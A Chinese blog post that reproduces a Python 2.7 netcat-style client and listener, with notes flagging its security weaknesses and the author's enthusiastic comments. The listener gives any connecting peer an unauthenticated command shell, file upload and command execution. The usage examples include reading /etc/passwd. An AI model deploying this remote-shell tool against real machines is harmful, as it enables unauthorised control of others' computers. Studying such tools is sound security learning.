python实现netcat部分功能源代码
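#!/opt/local/bin/python2.7
"""Minimal netcat-style TCP client/listener (Python 2.7).

In listen mode (-l) the script accepts TCP connections and, depending on
the options given, writes received bytes to a file (-u), runs one command
(-e) and/or serves an interactive command prompt (-c). Without -l it
connects to -t/-p, forwards stdin and prints whatever comes back.

Security properties visible in this file:
  * the listener performs no authentication and no encryption (plain
    SOCK_STREAM socket), so every peer that can reach the port gets the
    full functionality that was enabled on the command line;
  * commands are executed with ``shell=True`` under the account that
    started the script;
  * with no -t the listener binds to 0.0.0.0, i.e. every interface.
"""

import sys
import socket
import getopt
import threading
import subprocess

# define some global variables (filled in by main() from the command line)
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0


def run_command(command):
    """Run *command* through the system shell and return its output.

    stderr is merged into stdout. If the command exits non-zero or cannot
    be started, a fixed failure message is returned instead of raising.

    NOTE(security): ``shell=True`` hands the string to the shell verbatim.
    In -c mode the string comes straight from the network peer, so this is
    arbitrary command execution for whoever is connected.
    """
    # trim the trailing newline left over from the prompt input
    command = command.rstrip()

    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except Exception:
        # best effort: the caller always gets a string to send back
        # (Exception rather than a bare except, so Ctrl-C still propagates)
        output = "Failed to execute command.\r\n"

    return output


def client_handler(client_socket):
    """Serve one accepted connection according to the global options.

    Order of operations: optional upload (-u), optional single command
    (-e), optional interactive prompt (-c). The socket is always closed
    when the handler returns.
    """
    try:
        # check for upload
        if len(upload_destination):
            # Read until the peer closes (or half-closes) its sending side;
            # nothing below runs before that happens.
            # NOTE(security): there is no size limit, so the peer decides how
            # much memory and disk this consumes.
            chunks = []
            while True:
                data = client_socket.recv(1024)
                if not data:
                    break
                chunks.append(data)

            # now we take these bytes and try to write them out
            try:
                with open(upload_destination, "wb") as file_descriptor:
                    file_descriptor.write("".join(chunks))
            except (IOError, OSError):
                client_socket.sendall("Failed to save file to %s\r\n" % upload_destination)
            else:
                # acknowledge that we wrote the file out
                client_socket.sendall("Successfully saved file to %s\r\n" % upload_destination)

        # check for command execution
        if len(execute):
            client_socket.sendall(run_command(execute))

        # now we go into another loop if a command shell was requested
        if command:
            while True:
                # show a simple prompt
                client_socket.sendall("<BHP:#> ")

                # receive until we see a linefeed (enter key)
                cmd_buffer = ""
                while "\n" not in cmd_buffer:
                    data = client_socket.recv(1024)
                    if not data:
                        # peer disconnected; without this check the loop
                        # would spin forever on empty reads
                        return
                    cmd_buffer += data

                # execute the line and send back the results
                client_socket.sendall(run_command(cmd_buffer))
    except socket.error:
        # connection dropped mid-conversation; nothing left to do
        pass
    finally:
        client_socket.close()


def server_loop():
    """Listen on (target, port) and hand each connection to a new thread."""
    global target

    # if no target is defined we listen on all interfaces
    # NOTE(security): 0.0.0.0 exposes the listener on every network the host
    # is attached to; pass -t 127.0.0.1 to keep a test instance local.
    if not len(target):
        target = "0.0.0.0"

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)

    while True:
        client_socket, addr = server.accept()

        # spin off a thread to handle our new client
        client_thread = threading.Thread(target=client_handler, args=(client_socket,))
        client_thread.start()


def client_sender(buffer):
    """Connect to (target, port), send *buffer*, then relay stdin lines.

    After every send the reply is read in 4096-byte chunks until a short
    read and printed. The function returns when the peer closes the
    connection, on a socket error, or on EOF/Ctrl-C at the input prompt.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    try:
        # connect to our target host
        client.connect((target, port))

        # anything read from stdin up front is sent first
        if len(buffer):
            client.sendall(buffer)

        while True:
            # now wait for data back
            chunks = []
            peer_closed = False
            while True:
                data = client.recv(4096)
                if not data:
                    peer_closed = True
                    break
                chunks.append(data)
                # a short read is taken as "end of this reply"
                if len(data) < 4096:
                    break

            print "".join(chunks),

            if peer_closed:
                break

            # wait for more input
            buffer = raw_input("")
            buffer += "\n"

            # send it off
            client.sendall(buffer)
    except (socket.error, EOFError, KeyboardInterrupt):
        print "[*] Exception! Exiting."
    finally:
        # teardown the connection
        client.close()


def usage():
    """Print the help text and exit with status 0."""
    print "Netcat Replacement"
    print
    print "Usage: bhpnet.py -t target_host -p port"
    print "-l --listen                - listen on [host]:[port] for incoming connections"
    print "-e --execute=file_to_run   - execute the given file upon receiving a connection"
    print "-c --command               - initialize a command shell"
    print "-u --upload=destination    - upon receiving connection upload a file and write to [destination]"
    print
    print
    print "Examples: "
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -c"
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe"
    print "bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
    print "echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135"
    sys.exit(0)


def main():
    """Parse the command line into the module globals and start a mode."""
    global listen
    global port
    global execute
    global command
    global upload_destination
    global target

    if not len(sys.argv[1:]):
        usage()

    # read the commandline options
    # Long options that carry a value need a trailing "=" in the getopt
    # spec; without it "--port 9999" and friends are rejected.
    try:
        opts, args = getopt.getopt(
            sys.argv[1:],
            "hle:t:p:cu:",
            ["help", "listen", "execute=", "target=", "port=", "command", "upload="],
        )
    except getopt.GetoptError as err:
        print str(err)
        usage()

    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o in ("-l", "--listen"):
            listen = True
        elif o in ("-e", "--execute"):
            execute = a
        elif o in ("-c", "--command"):
            # matches the long name registered with getopt and shown in usage()
            command = True
        elif o in ("-u", "--upload"):
            upload_destination = a
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-p", "--port"):
            try:
                port = int(a)
            except ValueError:
                print "Invalid port: %s" % a
                usage()
        else:
            # not reachable with the spec above; explicit rather than an
            # assert, which is stripped under -O
            print "Unhandled Option"
            usage()

    if listen:
        # we are going to listen and potentially upload things, execute
        # commands and drop a shell back depending on the options above
        server_loop()
    elif len(target) and port > 0:
        # read in the buffer from the commandline
        # this will block, so send CTRL-D if not sending input to stdin
        buffer = sys.stdin.read()

        # send data off
        client_sender(buffer)
    else:
        # neither a listener nor a complete target/port pair was given
        usage()


if __name__ == "__main__":
    main()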
这段代码是我至今看到的最骚的一段代码了,贼牛逼。这段代码既是一个套接字的客户端,又是一个套接字的服务端,可以利用shell远程控制对方的计算机。
for example
首先执行python test.py -l -p 9999,用作一个服务端
然后执行python test.py -t localhost -p 9999
然后按下ctrl+d,就可以输入命令了,是不是贼强,我再去把代码精读一下。